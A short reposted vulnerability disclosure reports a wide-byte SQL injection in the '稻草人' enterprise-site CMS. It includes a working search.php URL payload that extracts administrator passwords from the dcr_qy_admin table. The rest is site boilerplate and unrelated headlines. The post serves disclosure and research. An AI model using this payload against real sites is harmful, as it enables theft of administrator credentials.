【漏洞】稻草人企业站管理系统宽字节注入

admin

139629
文章

114
评论

2021年4月3日19:44:10评论94 views字数 431阅读1分26秒阅读模式

By：毅心毅意

大家好啊。。。我是新人。。希望大家多多关照……

偶然在站长下载站下了一套企业建站程序，发现人气还蛮高的。

下载地址：

http://down.chinaz.com/soft/26802.htm

就去测试一下发现了一个宽字节注入漏洞。

http://127.0.0.1/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23

爆密码的效果如图：

【漏洞】稻草人企业站管理系统宽字节注入

第一次在t00ls发帖..哈哈

文章来源于lcx.cc:【漏洞】稻草人企业站管理系统宽字节注入

相关推荐: 【视频】实拍武汉神奇水上公交惊涛骇浪

文章来源于lcx.cc:【视频】实拍武汉神奇水上公交惊涛骇浪相关推荐: 【技巧】使用批处理、Bat 查找指定名字的进程使用批处理、Bat查找指定名字的进程： echo off del /q /f /a tasklist.txt del /q /f /a fin…

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

本文由 admin 发表于 2021年4月3日19:44:10
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
【漏洞】稻草人企业站管理系统宽字节注入https://cn-sec.com/archives/324657.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

【漏洞】稻草人企业站管理系统宽字节注入

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信